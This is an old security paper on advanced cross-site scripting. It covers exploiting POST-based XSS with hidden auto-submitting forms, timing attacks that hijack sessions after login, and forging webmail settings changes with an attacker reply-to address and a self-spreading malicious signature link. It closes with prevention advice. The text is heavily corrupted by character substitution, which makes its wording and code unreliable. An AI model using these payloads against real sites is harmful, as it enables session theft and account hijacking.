Advanced Cross Site Scripting by Gavin Zuchlinski http://libox.

net/ 10/16/2003

Table of Contents

Introduction !"# $ethod %xpansion on !"#: secure areas Generali&ed client auto'ation revention

Introduction I recently read in an article the incorrect state'ent that cross site scriptin( )*""+ can not be exploited i, the !"# 'ethod is used instead o, G%#- .hich is co'pletely ,alse. #he 'ethod used to exploit !"# variables 'ay also be 'odi,ied to allo. ,or 'ore advanced ti'in( attacks .hich could allo. an attacker to (ain access to areas that re/uire the user lo( in to a pass.ord protected area. 0hen coupled .ith social en(ineerin( this 'ethod beco'es an extre'ely reliable tool ,or attackers to (ain access to secured areas via account hi1ackin(. In typical cross site scriptin( the tar(et vie.s a .ebsite .hich contains code inserted into the 2#$3 .hich .as not .ritten by the .ebsite desi(ner or ad'inistrator. #his bypasses the docu'ent ob1ect 'odel .hich .as intended to protect do'ain speci,ic cookies )sessions- settin(s- etc.+. In 'ost instances the tar(et is sent a link to a .ebsite on the server .hich the tar(et has a le(iti'ate account and by vie.in( that .ebsite the attackers 'alicious code is executed )co''only 1avascript to send the user4s cookie to a third party serverin e,,ect stealin( their session and their account+. #his .as a /uick overvie. o, cross site scriptin( and a solid ,oundation is needed be,ore proceedin(- 'y reco''ended readin( is i5e,ense4s *"" article )(oo(le.co'+. #he attack presented belo. in con1unction .ith i5e,ense4s 'ethod o, attack auto'ation 'akes ,or a very po.er,ul co'bination. 6!#% )!ctober 17 2003+ 8 "verre 2useby has brou(ht to 'y attention that the (enerali&ed version attack is not uni/ue- it .as discovered ,irst by 9i' :ulton )http://....&ope.or(/$e'bers/1i'/Zope"ecurity/;lient"ide#ro1an+.ithout 'y kno.led(e.

Post Method <ecause !"# variables are sent separate o, the actual .ebsite =>3 a direct attack ,ro' the tar(et clickin( on the 'alicious link and directly accessin( the server vulnerable to the *"" attack is not possible )as ,ar as I kno.+. #his is opposed to a G%# re/uest .here the variable ar(u'ents are stored in the =>3- such as http://....(oo(le.co'/search?hl@enA/@xss .here the variables hl and / are seen in the =>3. #he i'plications o, variables bein( sent in this 'anner are not in the scope o, this article- but the !"# 'ethod sends variables in the 2## re/uest and is not inte(rated in the =>3 such as is the case .ith G%#. #o exploit a .eb pa(e .ith a cross site scriptin( vulnerability via a G%# variable a =>3 in the ,or' o, http://vulnerable.co'/search?/@BscriptCalert)docu'ent.cookie+ B/scriptC is co'posed. #his =>3 is then sent to the tar(et- upon clickin( the =>3 they are taken to vulnerable.co'4s handy search en(ine )not to 'ention the dual 2#$3 renderin( .ithin their site ,unctionality+ and the tar(et receives a 1avascript pop up .ith their session cookie. ;reatin( exploits ,or !"# re/uests are only trivially 'ore di,,icultan inter'ediary .eb pa(e is needed .hich .ill hold code that .ill ,orce the client .eb bro.ser in to 'akin( the !"# re/uest to the vulnerable server. #his is trivially done via a ,or' ).ith 'ethod !"# and action o, the tar(et script+ and 1avascript code .hich .ill auto'atically sub'it the ,or' on pa(e load. "ee exa'ple code block belo.. <form method="POST" action="http://vulnerable.com/search" name="explForm" <input t!pe=hidden name=" value="<script alert #document.coo$ie%</script " </form <script lan&ua&e="'avascript" setTimeout#(explForm.submit#%() *%+ </script !ne 'illisecond a,ter the pa(e is loaded containin( this code the ,or' )co'pletely invisible in the rendered 2#$3+ is sub'itted. In this case you have a si'ple search ,or DBscriptCalert)docu'ent.cookie+ B/scriptCD done on vulnerable.co'4s search en(ine )and conse/uently a 1avascript alert appears because ,or the sake o, this papervulnerable.co'4s search en(ine is vulnerable to a cross site scriptin( attack+. #he above code can be easily chan(ed i, the tar(et script

re/uires variables to be G%#- chan(e 'ethod@D !"#D to 'ethod@DG%#D. #he above code can be placed on a static .eb pa(e on a .eb server controlled by the attacker and then the link sent to the tar(et. Enother vector to deliver the ,or' and 1avascript to the tar(et is via a site vulnerable to *"" throu(h a G%# re/uest. In either case above the attacker sends the tar(et the 'alicious .eb pa(e- the 'alicious .eb pa(e ,or's the re/uest and the re/uest is sent to the vulnerable server. #his advances the classical cross site scriptin( attack ,ro' a sin(le hop )tar(et FFC pa(e .ithin vulnerable .ebsite containin( inserted code+ to t.o hops )tar(et FFC inter'ediary re/uest ,or'ulation pa(e FFC pa(e .ithin vulnerable .ebsite containin( inserted code+.

Expansion on POST: secure areas #he proble' o, pass.ord protected areas also arises- .here a pass.ord is re/uired every ti'e the user accesses the .ebsite. In 'any .ebsites .hich re/uire secure client access the cookie is not persistent to prevent ,urther users on the co'puter ,ro' lo((in( in to the account. <uildin( upon the code presented above .e can circu'vent any restrictions and still steal the session cookie ,or the te'porary session. =n,ortunately the ti'e .indo. in .hich attacks can take place in 'any cases is very s'all- .ith the help o, i5e,ense4s idea o, auto'atin( attacks this s'all ti'e .indo. is no lon(er an issue. <y addin( code on the inter'ediary .eb pa(e .hich opens a ne. .indo. .ith the lo(in pro'pt the user 'ay no. lo( in to the secured area )so'e social en(ineerin( 'i(ht be re/uired in order to ,orce the user to lo( in+. "ee code belo.. <form method="POST" action="http://vulnerable.com/search" name="explForm" <input t!pe=hidden name=" value="<script alert #document.coo$ie%</script " </form <script lan&ua&e="'avascript" window.open(http://vulnerable.com/secure_login); setTimeout#(explForm.submit#%() 1000* 0%+ </script
,ote: chan&es from previous code dipla!ed in bold

0ith the inter'ediary .eb pa(e still in the back(round- the ,or' sub'ission 'ay no. be ti'ed to allo. the user to lo( in success,ully be,ore the exploit is sent. #o chan(e the ti'e until the ,or' is sub'itted chan(e the second ar(u'ent in the set#i'eout ,unctionthis is the ti'e in 'illiseconds until the 1avascript code in ar(u'ent one is executed. 0ith the user success,ully lo((ed in a child .indo. o, the inter'ediary .eb pa(e- .hen the ,or' on the inter'ediary .eb pa(e is sub'itted the ,or' .ill (o directly to the proble'atic script'alicious code inserted- and the user session 'ay be stolen. =sin( an inter'ediary ,or exploitation sli(htly increases the co'plexity o, a success,ul attack but allo.s ,or a hi(h de(ree o, ,lexibility- any variable that is used on a dyna'ically created .eb pa(e .hich does not saniti&e 2#$3 'arkup is vulnerable to cross site scriptin(.

Generali ed Client Auto!ation Generali&in( on the above techni/ue brin(s to li(ht another- and in so'e cases a very serious- vulnerability. #he proposed techni/ue allo.s an attacker to ,ill out ,or's .ith data they speci,y and sub'it the' auto'atically under the context o, the client. Eny ,or's .hich accept data ,ro' the client- assu'in( they in ,act inputted the data they are sub'ittin(- are vulnerable. #his arises .hen the ,or' itsel, is dependent only on static or predictable in,or'ation )in,or'ation (iven to a third party site such as re,errer can help in prediction+. =sin( the 'ethod o, exploitation presented above- client auto'ation o, ,or' sub'ission is a trivial task. <form method="POST" action="http://vulnerable.com/chan&e-ailSettin&s" name="f" <input t!pe=hidden name=repl!.to value="attac$er/h0x.com" <input t!pe=hidden name=si&nature value=1<a href=http://h0x.com/exploit.htm 2lic$ here</a for a free computer securit! test) trust me) 3 used it and 4as ama5ed61 </form <script lan&ua&e="'avascript" f.submit#%+ </script En interestin( use o, this .ould be the creation o, a .eb'ail si(nature virus. =sin( the techni/ues presented above the attacker could co'pose a .eb pa(e that .hen visited .ould auto'ate the the ,or' .hich chan(es the si(nature sent out on e'ails to contain the link to the 'alicious pa(e itsel,. %very ti'e a user Gin,ectedH .ith the si(nature virus .ould send an e'ail unkno.in(ly they .ould also send alon( text and a link persuadin( the next victi' to also click itand beco'e in,ected. %asy auto'ated spa''in(? Ies. 2ot'ail and IahooJ $ail have both been tested ,or this vulnerability and they are secure a(ainst it- ho.ever each appear to have co'bated the ,la. in very di,,erent .ays. 2ot'ail uses a si'ple re,errer check- i, the re,errer is not ,ro' an authori&ed 2ot'ail pa(e the user is sent directly to a lo(in pa(e. Iahoo enacted a very novel approach to ,ix the proble'- on each ,or' there is a hidden value na'ed G.cru'bH .hich is related to the cookie. Ell protection a(ainst this ,la. lies .ithin the cru'b- i, the cru'b can be predicted .ithout the cookie then Iahoo is vulnerable to this ,la..

Prevention <ecause the (enerali&ed client auto'ation attack is very si'ple at the server end )ideally the server vie.s only a le(iti'ate re/uest by the client+ it is so'e.hat 'ore di,,icult to prevent. 5ue to the ,act that the client ,or's the re/uest at their bro.ser 2## >e,errer headers can be trusted and should be validated to ensure they co'e ,ro' an internal script inside the syste'. >e,errer checkin( assu'es ho.ever that the attacker can not insert arbitrary 2#$3 in to any o, the trusted scripts- thou(h such attack .ould be considered cross site scriptin( and separate ,ro' this. Et the very 'ini'u' to protect a(ainst cross site scriptin( attacks user input 'ust be stripped o, any potentially dan(erous characters such as B C G A. Es any conscientious security pro,essional .ould doI 'ust preach the i'portance o, the .hitelistin( approach over blacklistin(K in .hitelistin( only explicitly allo.ed characters are per'itted in the input. It appears that all security vulnerabilities ste' ,ro' user input- G2ello .orldH can not be exploited unless the attacker can 'ana(e in so'e ,or' to input data. #his should lead us to believe that it is trivial to ensure security )in a lar(e a'ount o, cases o, cases- but not all+ by validatin( user input to a strict ,or'. >e(ular expressions are extre'ely po.er,ul ,or the task o, .hitelistin( characters and validatin( that data does in ,act con,or' to the ,or' standards )include len(th constraints also in the concept o, ,or'+. !nce data is validated to a set o, criteria security analysis is purely creative thinkin( o, ho. the criteria 'ay be 'ana(ed to let throu(h speci,ic ite's it should not. Enother option to aid in the prevention o, security ,la.s is a pro1ect I a' a,,iliated .ith- currently code na'ed 6irvana. #his pro1ect is devoted to creation o, user input ,ilters and validation ,unction to help developers create secure code ,aster. #he pro1ect pa(e is no. housed at http://libox.net/saniti&e.php but .ill soon be 'ovin( to http://....o.asp.or(. $y ho'e on the .eb is http://libox.net/- the 'ost current version o, this docu'ent 'ay be ,ound there.